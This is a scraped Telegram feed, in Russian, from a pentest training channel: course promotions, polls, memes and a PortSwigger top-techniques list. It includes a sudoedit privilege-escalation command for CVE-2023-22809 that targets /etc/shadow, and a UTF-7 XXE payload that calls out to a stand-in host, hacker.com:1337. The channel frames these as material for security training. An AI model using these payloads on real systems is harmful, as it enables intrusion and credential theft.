RESOLUTE ATTACK
6.42K subscribers
207 photos
39 videos
84 files
297 links
⚡️RESOLUTE ATTACK - Компания по информационной безопасности

YouTube - https://www.youtube.com/@RESOLUTE-ATTACK

Chat - @RESOLUTECHAT

Web Site - www.resolute-attack.com

Обратная связь - @ResoluteAttack_Bot
Download Telegram
Советую всем такой wordlist иметь в арсенале 😂
🤣51🔥6🤔4
💀HACKERONE - CSRF

Всем привет! С Вами wr3dmast3r, и сегодня мы разберем репорт с HackerOne.
Сегодняшняя уязвимость связана с CSRF и подделкой запросов для создания привилегированного пользователя

Читать
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18🔥5😈2👨‍💻1
⚡️PRTT - PENETRATION RED TEAM TESTER

Немного материала из курса.
Стек основных протоколов.

RESOLUTE ATTACK
Please open Telegram to view this post
VIEW IN TELEGRAM
👍37🔥8🤩5🤣32🤔1
Чистим подписоту от удалённых аккаунтов
😱52👍46🔥3😈3🤩2👨‍💻1
Запустить ли CTF среди подписчиков?
Anonymous Poll
54%
Да
15%
Конечно, погнали
31%
Погнали с командой RED TEAM и BLUE TEAM
🕊4👍2
Скоро будет очень интересно, дайте нам время
На контент времени не хватает 🤗
👍27
💻 BURP SUITE - HOTKEYS

Материал из курса
RESOLUTE ATTACK
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥3😍1🤣1
И не поспоришь 🤣
🤣35👨‍💻5
Forwarded from RedTeam Notes (Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit 𓅓...)
Для эксплуатации уязвимости CVE-2023-22809 у пользователя, под которым вы залогинены, должно быть разрешение на изменение какого-либо файла при помощи sudoedit или sudo -e.
Так выглядит один из примеров уязвимой конфигурации /etc/sudoers (Рисунок 1)
Для проверки прав пользователя можно исполнить команду sudo -l (Рисунок 2)
Далее создаем команду для эксплуатации: EDITOR='vi -- /etc/shadow' sudoedit /etc/custom/service.conf
(Вы можете поменять vi на любой редактор текста доступный в системе. Так же файл /etc/shadow можно поменять на любой, необходимый для изменения. Файл /etc/custom/service.conf варируется в зависимости от прав пользователя (Рисунок 2))
👍16🔥61👨‍💻1
⚡️ XXE UTF-7

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hacker.com:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

Для преобразования между UTF-8 и UTF-7 используйте recode.

recode UTF8..UTF7 payload-file.xml

UTF-7 (формат преобразования Unicode - 7-bit) - это кодировка символов, которая позволяет кодировать определенные символы ASCII, используя только 7-битные кодовые единицы.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍176🔥2
Возможно ли использовать SSRF в качестве транспорта для Log4shell?
Anonymous Poll
76%
Да
24%
Нет
🤔18👍11
Forwarded from E1tex
👍2914🔥8🤩3🕊3
💻 PRTT CERTIFICATE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥37😍8👍7🤔21
👊 Отечественный киберполигон - Welcome

Киберполигон направлен на обучение командной работе. Если ты «защитник», то научишься обнаруживать нежелательные события в сети, разбирать их с командой, анализировать инциденты, реагировать и устранять их правильным образом и в срок.

Если ты в команде нападающих (пентестер, багхантер, внутренний специалист), то в тренировках ты учишься не только взламывать, но и правильно документировать отчеты об уязвимостях и составлять рекомендации для их устранения.

Ссылка на новость
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩27🔥10👍8🤣7🤔1
Хотим попробовать?
Anonymous Poll
92%
Да
8%
Нет
🔥18🤔4
Live stream scheduled for
PortSwigger's топ 10 веб хакинг техник 2022

В течение последних двух недель экспертная группа в составе исследователей: Николя Грегуара, Соруша Далили, Filedescriptor обсудила и проанализировализа 15 изумительных техник, чтобы представить вам 10 лучших новых методов веб-взлома 2022 года.


🔤 Account hijacking using dirty dancing in sign-in OAuth-flows

🔤 Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling

🔤 Zimbra Email - Stealing Clear-Text Credentials via Memcache injection

🔤 Hacking the Cloud with SAML

🔤 Bypassing .NET Serialization Binders

🔤 Making HTTP header injection critical via response queue poisoning

🔤 Worldwide Server-side Cache Poisoning on All Akamai Edge Nodes

🔤 Psychic Signatures in Java

🔤 Practical client-side path-traversal attacks

🔤🔤 Exploiting Web3's Hidden Attack Surface: Universal XSS on Netlify's Next.js Library
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20👍73